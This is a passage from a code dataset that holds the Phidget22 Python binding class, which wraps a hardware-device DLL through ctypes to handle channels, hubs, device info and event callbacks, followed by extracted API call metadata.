'MinkHead', (['local_in_levels', 'local_in_channels', 'local_map_channels'], {}), '(local_in_levels, local_in_channels, local_map_channels)\\n', (2033, 2089), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\\n'), ((856, 867), 'third_party.minkloc3d.minkloc.MinkLoc3D', 'MinkLoc3D', ([], {}), '()\\n', (865, 867), False, 'from third_party.minkloc3d.minkloc import MinkLoc3D\\n')]"}}},{"rowIdx":791,"cells":{"code":{"kind":"string","value":"import sys\nimport ctypes\nfrom Phidget22.PhidgetSupport import PhidgetSupport\nfrom Phidget22.Async import *\nfrom Phidget22.ChannelClass import ChannelClass\nfrom Phidget22.ChannelSubclass import ChannelSubclass\nfrom Phidget22.DeviceClass import DeviceClass\nfrom Phidget22.DeviceID import DeviceID\nfrom Phidget22.ErrorEventCode import ErrorEventCode\nfrom Phidget22.PhidgetException import PhidgetException\n\nclass Phidget:\n\n\tdef __init__(self):\n\t\tself.handle = ctypes.c_void_p()\n\n\t\tif sys.platform == 'win32':\n\t\t\tself._AttachFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)\n\t\telse:\n\t\t\tself._AttachFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)\n\t\tself._Attach = None\n\t\tself._onAttach = None\n\n\t\tif sys.platform == 'win32':\n\t\t\tself._DetachFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)\n\t\telse:\n\t\t\tself._DetachFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)\n\t\tself._Detach = None\n\t\tself._onDetach = None\n\n\t\tif sys.platform == 'win32':\n\t\t\tself._ErrorFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int, ctypes.c_char_p)\n\t\telse:\n\t\t\tself._ErrorFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int, ctypes.c_char_p)\n\t\tself._Error = None\n\t\tself._onError = None\n\n\t\tif sys.platform == 'win32':\n\t\t\tself._PropertyChangeFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)\n\t\telse:\n\t\t\tself._PropertyChangeFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)\n\t\tself._PropertyChange = None\n\t\tself._onPropertyChange = None\n\n\n\tdef __eq__(self, other):\n\t\treturn hasattr(other, 'handle') and self.handle.value == other.handle.value\n\n\tdef __hash__(self):\n\t\treturn self.handle.value\n\n\tdef __str__(self):\n\t\t_value = (ctypes.c_char * 65536)()\n\t\t_valueLen = ctypes.c_int32(65536)\n\t\tif self.getIsChannel():\n\t\t\t__func = PhidgetSupport.getDll().channelInfo\n\t\telse:\n\t\t\t__func = PhidgetSupport.getDll().deviceInfo\n\t\tresult = __func(self.handle, ctypes.byref(_value), _valueLen)\n\t\treturn _value.value.decode('utf- 8')\n\n\tdef __del__(self):\n\t\t__func = PhidgetSupport.getDll().Phidget_delete\n\t\t__func.restype = ctypes.c_int32\n\t\tres = __func(ctypes.byref(self.handle))\n\t\tself.handle = None\n\t\tif res > 0:\n\t\t\traise PhidgetException(res)\n\n\tdef _localAttachEvent(self, handle, userPtr):\n\t\tif self._Attach == None:\n\t\t\treturn\n\t\tself._Attach(self)\n\n\tdef setOnAttachHandler(self, handler):\n\t\tif handler == None:\n\t\t\tself._Attach = None\n\t\t\tself._onAttach = None\n\t\telse:\n\t\t\tself._Attach = handler\n\t\t\tself._onAttach = self._AttachFactory(self._localAttachEvent)\n\n\t\ttry:\n\t\t\t__func = PhidgetSupport.getDll().Phidget_setOnAttachHandler\n\t\t\t__func.restype = ctypes.c_int32\n\t\t\tres = __func(self.handle, self._onAttach, None)\n\t\texcept RuntimeError:\n\t\t\tself._Attach = None\n\t\t\tself._onAttach = None\n\n\tdef _localDetachEvent(self, handle, userPtr):\n\t\tif self._Detach == None:\n\t\t\treturn\n\t\tself._Detach(self)\n\n\tdef setOnDetachHandler(self, handler):\n\t\tif handler == None:\n\t\t\tself._Detach = None\n\t\t\tself._onDetach = None\n\t\telse:\n\t\t\tself._Detach = handler\n\t\t\tself._onDetach = self._DetachFactory(self._localDetachEvent)\n\n\t\ttry:\n\t\t\t__func = PhidgetSupport.getDll().Phidget_setOnDetachHandler\n\t\t\t__func.restype = ctypes.c_int32\n\t\t\tres = __func(self.handle, self._onDetach, None)\n\t\texcept RuntimeError:\n\t\t\tself._Detach = None\n\t\t\tself._onDetach = None\n\n\tdef _localErrorEvent(self, handle, userPtr, Code, Description):\n\t\tif self._Error == None:\n\t\t\treturn\n\t\tDescription = Description.decode('utf-8')\n\t\tself._Error(self, Code, Description)\n\n\tdef setOnErrorHandler(self, handler):\n\t\tif handler == None:\n\t\t\tself._Error = None\n\t\t\tself._onError = None\n\t\telse:\n\t\t\tself._Error = handler\n\t\t\tself._onError = self._ErrorFactory(self._localErrorEvent)\n\n\t\ttry:\n\t\t\t__func = PhidgetSupport.getDll().Phidget_setOnErrorHandler\n\t\t\t__func.restype = ctypes.c_int32\n\t\t\tres = __func(self.handle, self._onError, None)\n\t\texcept RuntimeError:\n\t\t\tself._Error = None\n\t\t\tself._onError = None\n\n\tdef _localPropertyChangeEvent(self, handle, userPtr, propertyName):\n\t\tif self._PropertyChange == None:\n\t\t\treturn\n\t\tpropertyName = propertyName.decode('utf-8')\n\t\tself._PropertyChange(self, propertyName)\n\n\tdef setOnPropertyChangeHandler(self, handler):\n\t\tif handler == None:\n\t\t\tself._PropertyChange = None\n\t\t\tself._onPropertyChange = None\n\t\telse:\n\t\t\tself._PropertyChange = handler\n\t\t\tself._onPropertyChange = self._PropertyChangeFactory(self._localPropertyChangeEvent)\n\n\t\ttry:\n\t\t\t__func = PhidgetSupport.getDll().Phidget_setOnPropertyChangeHandler\n\t\t\t__func.restype = ctypes.c_int32\n\t\t\tres = __func(self.handle, self._onPropertyChange, None)\n\t\texcept RuntimeError:\n\t\t\tself._PropertyChange = None\n\t\t\tself._onPropertyChange = None\n\n\t@staticmethod\n\tdef finalize(flags):\n\t\t_flags = ctypes.c_int32(flags)\n\n\t\t__func = PhidgetSupport.getDll().Phidget_finalize\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(_flags)\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\n\t@staticmethod\n\tdef getLibraryVersion():\n\t\t_LibraryVersion = ctypes.c_char_p()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getLibraryVersion\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(ctypes.byref(_LibraryVersion))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _LibraryVersion.value.decode('utf-8')\n\n\t@staticmethod\n\tdef getLibraryVersionNumber():\n\t\t_LibraryVersionNumber = ctypes.c_char_p()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getLibraryVersionNumber\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(ctypes.byref(_LibraryVersionNumber))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _LibraryVersionNumber.value.decode('utf-8')\n\n\t@staticmethod\n\tdef resetLibrary():\n\t\t__func = PhidgetSupport.getDll().Phidget_resetLibrary\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func()\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\n\tdef getAttached(self):\n\t\t_Attached = ctypes.c_int()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getAttached\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_Attached))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _Attached.value\n\n\tdef getChannel(self):\n\t\t_Channel = ctypes.c_int()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getChannel\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_Channel))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _Channel.value\n\n\tdef setChannel(self, Channel):\n\t\t_Channel = ctypes.c_int(Channel)\n\n\t\t__func = PhidgetSupport.getDll().Phidget_setChannel\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, _Channel)\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\n\tdef getChannelClass(self):\n\t\t_ChannelClass = ctypes.c_int()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getChannelClass\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_ChannelClass))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _ChannelClass.value\n\n\tdef getChannelClassName(self):\n\t\t_ChannelClassName = ctypes.c_char_p()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getChannelClassName\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_ChannelClassName))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _ChannelClassName.value.decode('utf-8')\n\n\tdef getChannelName(self):\n\t\t_ChannelName = ctypes.c_char_p()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getChannelName\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_ChannelName))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _ChannelName.value.decode('utf-8')\n\n\tdef getChannelSubclass(self):\n\t\t_ChannelSubclass = ctypes.c_int()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getChannelSubclass\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_ChannelSubclass))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _ChannelSubclass.value\n\n\tdef close(self):\n\t\t__func = PhidgetSupport.getDll().Phidget_close\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle)\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\n\tdef getDeviceChannelCount(self, cls):\n\t\t_cls = ctypes.c_int(cls)\n\t\t_count = ctypes.c_uint32()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getDeviceChannelCount\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, _cls, ctypes.byref(_count))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _count.value\n\n\tdef getDeviceClass(self):\n\t\t_DeviceClass = ctypes.c_int()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getDeviceClass\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_DeviceClass))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _DeviceClass.value\n\n\tdef getDeviceClassName(self):\n\t\t_DeviceClassName = ctypes.c_char_p()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getDeviceClassName\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_DeviceClassName))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _DeviceClassName.value.decode('utf-8')\n\n\tdef getDeviceID(self):\n\t\t_DeviceID = ctypes.c_int()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getDeviceID\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_DeviceID))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _DeviceID.value\n\n\tdef getDeviceLabel(self):\n\t\t_DeviceLabel = ctypes.c_char_p()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getDeviceLabel\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_DeviceLabel))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _DeviceLabel.value.decode('utf-8')\n\n\tdef setDeviceLabel(self, DeviceLabel):\n\t\t_DeviceLabel = ctypes.create_string_buffer(DeviceLabel.encode('utf-8'))\n\n\t\t__func = PhidgetSupport.getDll().Phidget_setDeviceLabel\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_DeviceLabel))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\n\tdef getDeviceName(self):\n\t\t_DeviceName = ctypes.c_char_p()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getDeviceName\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_DeviceName))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _DeviceName.value.decode('utf-8')\n\n\tdef getDeviceSerialNumber(self):\n\t\t_DeviceSerialNumber = ctypes.c_int32()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getDeviceSerialNumber\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_DeviceSerialNumber))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _DeviceSerialNumber.value\n\n\tdef setDeviceSerialNumber(self, DeviceSerialNumber):\n\t\t_DeviceSerialNumber = ctypes.c_int32(DeviceSerialNumber)\n\n\t\t__func = PhidgetSupport.getDll().Phidget_setDeviceSerialNumber\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, _DeviceSerialNumber)\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\n\tdef getDeviceSKU(self):\n\t\t_DeviceSKU = ctypes.c_char_p()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getDeviceSKU\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_DeviceSKU))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _DeviceSKU.value.decode('utf-8')\n\n\tdef getDeviceVersion(self):\n\t\t_DeviceVersion = ctypes.c_int()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getDeviceVersion\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_DeviceVersion))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _DeviceVersion.value\n\n\tdef getHub(self):\n\t\t_Hub = ctypes.c_void_p()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getHub\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_Hub))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\t__Hub = Phidget()\n\t\t__Hub.handle = _Hub\n\t\treturn __Hub\n\n\tdef getHubPort(self):\n\t\t_HubPort = ctypes.c_int()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getHubPort\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_HubPort))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _HubPort.value\n\n\tdef setHubPort(self, HubPort):\n\t\t_HubPort = ctypes.c_int(HubPort)\n\n\t\t__func = PhidgetSupport.getDll().Phidget_setHubPort\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, _HubPort)\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\n\tdef getHubPortCount(self):\n\t\t_HubPortCount = ctypes.c_int()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getHubPortCount\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_HubPortCount))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _HubPortCount.value\n\n\tdef getHubPortSpeed(self):\n\t\t_HubPortSpeed = ctypes.c_uint32()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getHubPortSpeed\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_HubPortSpeed))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _HubPortSpeed.value\n\n\tdef setHubPortSpeed(self, HubPortSpeed):\n\t\t_HubPortSpeed = ctypes.c_uint32(HubPortSpeed)\n\n\t\t__func = PhidgetSupport.getDll().Phidget_setHubPortSpeed\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, _HubPortSpeed)\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\n\tdef getMaxHubPortSpeed(self):\n\t\t_MaxHubPortSpeed = ctypes.c_uint32()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getMaxHubPortSpeed\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_MaxHubPortSpeed))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _MaxHubPortSpeed.value\n\n\tdef getHubPortSupportsSetSpeed(self):\n\t\t_HubPortSupportsSetSpeed = ctypes.c_int()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getHubPortSupportsSetSpeed\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_HubPortSupportsSetSpeed))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _HubPortSupportsSetSpeed.value\n\n\tdef getIsChannel(self):\n\t\t_IsChannel = ctypes.c_int()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getIsChannel\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_IsChannel))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _IsChannel.value\n\n\tdef getIsHubPortDevice(self):\n\t\t_IsHubPortDevice = ctypes.c_int()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getIsHubPortDevice\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_IsHubPortDevice))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _IsHubPortDevice.value\n\n\tdef setIsHubPortDevice(self, IsHubPortDevice):\n\t\t_IsHubPortDevice = ctypes.c_int(IsHubPortDevice)\n\n\t\t__func = PhidgetSupport.getDll().Phidget_setIsHubPortDevice\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, _IsHubPortDevice)\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\n\tdef getIsLocal(self):\n\t\t_IsLocal = ctypes.c_int()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getIsLocal\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_IsLocal))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _IsLocal.value\n\n\tdef setIsLocal(self, IsLocal):\n\t\t_IsLocal = ctypes.c_int(IsLocal)\n\n\t\t__func = PhidgetSupport.getDll().Phidget_setIsLocal\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, _IsLocal)\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\n\tdef getIsRemote(self):\n\t\t_IsRemote = ctypes.c_int()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getIsRemote\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_IsRemote))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _IsRemote.value\n\n\tdef setIsRemote(self, IsRemote):\n\t\t_IsRemote = ctypes.c_int(IsRemote)\n\n\t\t__func = PhidgetSupport.getDll().Phidget_setIsRemote\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, _IsRemote)\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\n\tdef open(self):\n\t\t__func = PhidgetSupport.getDll().Phidget_open\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle)\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\n\tdef openWaitForAttachment(self, timeout):\n\t\t_timeout = ctypes.c_uint32(timeout)\n\n\t\t__func = PhidgetSupport.getDll().Phidget_openWaitForAttachment\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, _timeout)\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\n\tdef getParent(self):\n\t\t_Parent = ctypes.c_void_p()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getParent\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_Parent))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\t__Parent = Phidget()\n\t\t__Parent.handle = _Parent\n\t\treturn __Parent\n\n\tdef getServerHostname(self):\n\t\t_ServerHostname = ctypes.c_char_p()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getServerHostname\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_ServerHostname))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _ServerHostname.value.decode('utf-8')\n\n\tdef getServerName(self):\n\t\t_ServerName = ctypes.c_char_p()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getServerName\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_ServerName))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _ServerName.value.decode('utf-8')\n\n\tdef setServerName(self, ServerName):\n\t\t_ServerName = ctypes.create_string_buffer(ServerName.encode('utf-8'))\n\n\t\t__func = PhidgetSupport.getDll().Phidget_setServerName\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_ServerName))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\n\tdef getServerPeerName(self):\n\t\t_ServerPeerName = ctypes.c_char_p()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getServerPeerName\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_ServerPeerName))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _ServerPeerName.value.decode('utf-8')\n\n\tdef getServerUniqueName(self):\n\t\t_ServerUniqueName = ctypes.c_char_p()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getServerUniqueName\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_ServerUniqueName))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _ServerUniqueName.value.decode('utf-8')\n\n\tdef getMaxVINTDeviceSpeed(self):\n\t\t_MaxVINTDeviceSpeed = ctypes.c_uint32()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getMaxVINTDeviceSpeed\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_MaxVINTDeviceSpeed))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _MaxVINTDeviceSpeed.value\n\n\tdef getVINTDeviceSupportsSetSpeed(self):\n\t\t_VINTDeviceSupportsSetSpeed = ctypes.c_int()\n\n\t\t__func = PhidgetSupport.getDll().Phidget_getVINTDeviceSupportsSetSpeed\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_VINTDeviceSupportsSetSpeed))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\t\treturn _VINTDeviceSupportsSetSpeed.value\n\n\tdef writeDeviceLabel(self, deviceLabel):\n\t\t_deviceLabel = ctypes.create_string_buffer(deviceLabel.encode('utf-8'))\n\n\t\t__func = PhidgetSupport.getDll().Phidget_writeDeviceLabel\n\t\t__func.restype = ctypes.c_int32\n\t\tresult = __func(self.handle, ctypes.byref(_deviceLabel))\n\n\t\tif result > 0:\n\t\t\traise PhidgetException(result)\n\n\n\tANY_SERIAL_NUMBER = -1\n\n\tANY_HUB_PORT = -1\n\n\tANY_CHANNEL = -1\n\n\tANY_LABEL = None\n\n\tINFINITE_TIMEOUT = 0\n\n\tDEFAULT_TIMEOUT = 1000\n"},"apis":{"kind":"list like","value":["ctypes.CFUNCTYPE","ctypes.c_uint32","ctypes.byref","ctypes.c_int32","Phidget22.PhidgetSupport.PhidgetSupport.getDll","Phidget22.PhidgetException.PhidgetException","ctypes.WINFUNCTYPE","ctypes.c_int","ctypes.c_void_p","ctypes.c_char_p"],"string":"[\n \"ctypes.CFUNCTYPE\",\n \"ctypes.c_uint32\",\n \"ctypes.byref\",\n \"ctypes.c_int32\",\n \"Phidget22.PhidgetSupport.PhidgetSupport.getDll\",\n \"Phidget22.PhidgetException.PhidgetException\",\n \"ctypes.WINFUNCTYPE\",\n \"ctypes.c_int\",\n \"ctypes.c_void_p\",\n \"ctypes.c_char_p\"\n]"},"extract_api":{"kind":"string","value":"[((457, 474), 'ctypes.c_void_p', 'ctypes.c_void_p', ([], {}), '()\\n', (472, 474), False, 'import ctypes\\n'), ((1830, 1851), 'ctypes.c_int32', 'ctypes.c_int32', (['(65536)'], {}), '(65536)\\n', (1844, 1851), False, 'import ctypes\\n'), ((4772, 4793), 'ctypes.c_int32', 'ctypes.c_int32', (['flags'], {}), '(flags)\\n', (4786, 4793), False, 'import ctypes\\n'), ((5022, 5039), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\\n', (5037, 5039), False, 'import ctypes\\n'), ((5359, 5376), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\\n', (5374, 5376), False, 'import ctypes\\n'), ((5879, 5893), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\\n', (5891, 5893), False, 'import ctypes\\n'), ((6155, 6169), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\\n', (6167, 6169), False, 'import ctypes\\n'), ((6437, 6458), 'ctypes.c_int', 'ctypes.c_int', (['Channel'], {}), '(Channel)\\n', (6449, 6458), False, 'import ctypes\\n'), ((6689, 6703), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\\n', (6701, 6703), False, 'import ctypes\\n'), ((6995, 7012), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\\n', (7010, 7012), False, 'import ctypes\\n'), ((7322, 7339), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\\n', (7337, 7339), False, 'import ctypes\\n'), ((7642, 7656), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\\n', (7654, 7656), False, 'import ctypes\\n'), ((8137, 8154), 'ctypes.c_int', 'ctypes.c_int', (['cls'], {}), '(cls)\\n', (8149, 8154), False, 'import ctypes\\n'), ((8166, 8183), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\\n', (8181, 8183), False, 'import ctypes\\n'), ((8463, 8477), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\\n', (8475, 8477), False, 'import ctypes\\n'), ((8764, 8781), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\\n', (8779, 8781), False, 'import ctypes\\n'), ((9082, 9096), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\\n', (9094, 9096), False, 'import ctypes\\n'), ((9366, 9383), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\\n', (9381, 9383), False, 'import ctypes\\n'), ((9996, 10013), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\\n', (10011, 10013), False, 'import ctypes\\n'), ((10319, 10335), 'ctypes.c_int32', 'ctypes.c_int32', ([], {}), '()\\n', (10333, 10335), False, 'import ctypes\\n'), ((10669, 10703), 'ctypes.c_int32', 'ctypes.c_int32', (['DeviceSerialNumber'], {}), '(DeviceSerialNumber)\\n', (10683, 10703), False, 'import ctypes\\n'), ((10950, 10967), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\\n', (10965, 10967), False, 'import ctypes\\n'), ((11260, 11274), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\\n', (11272, 11274), False, 'import ctypes\\n'), ((11543, 11560), 'ctypes.c_void_p', 'ctypes.c_void_p', ([], {}), '()\\n', (11558, 11560), False, 'import ctypes\\n'), ((11844, 11858), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\\n', (11856, 11858), False, 'import ctypes\\n'), ((12126, 12147), 'ctypes.c_int', 'ctypes.c_int', (['HubPort'], {}), '(HubPort)\\n', (12138, 12147), False, 'import ctypes\\n'), ((12378, 12392), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\\n', (12390, 12392), False, 'import ctypes\\n'), ((12676, 12693), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\\n', (12691, 12693), False, 'import ctypes\\n'), ((12991, 13020), 'ctypes.c_uint32', 'ctypes.c_uint32', (['HubPortSpeed'], {}), '(HubPortSpeed)\\n', (13006, 13020), False, 'import ctypes\\n'), ((13267, 13284), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\\n', (13282, 13284), False, 'import ctypes\\n'), ((13599, 13613), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\\n', (13611, 13613), False, 'import ctypes\\n'), ((13924, 13938), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\\n', (13936, 13938), False, 'import ctypes\\n'), ((14219, 14233), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\\n', (14231, 14233), False, 'import ctypes\\n'), ((14549, 14578), 'ctypes.c_int', 'ctypes.c_int', (['IsHubPortDevice'], {}), '(IsHubPortDevice)\\n', (14561, 14578), False, 'import ctypes\\n'), ((14815, 14829), 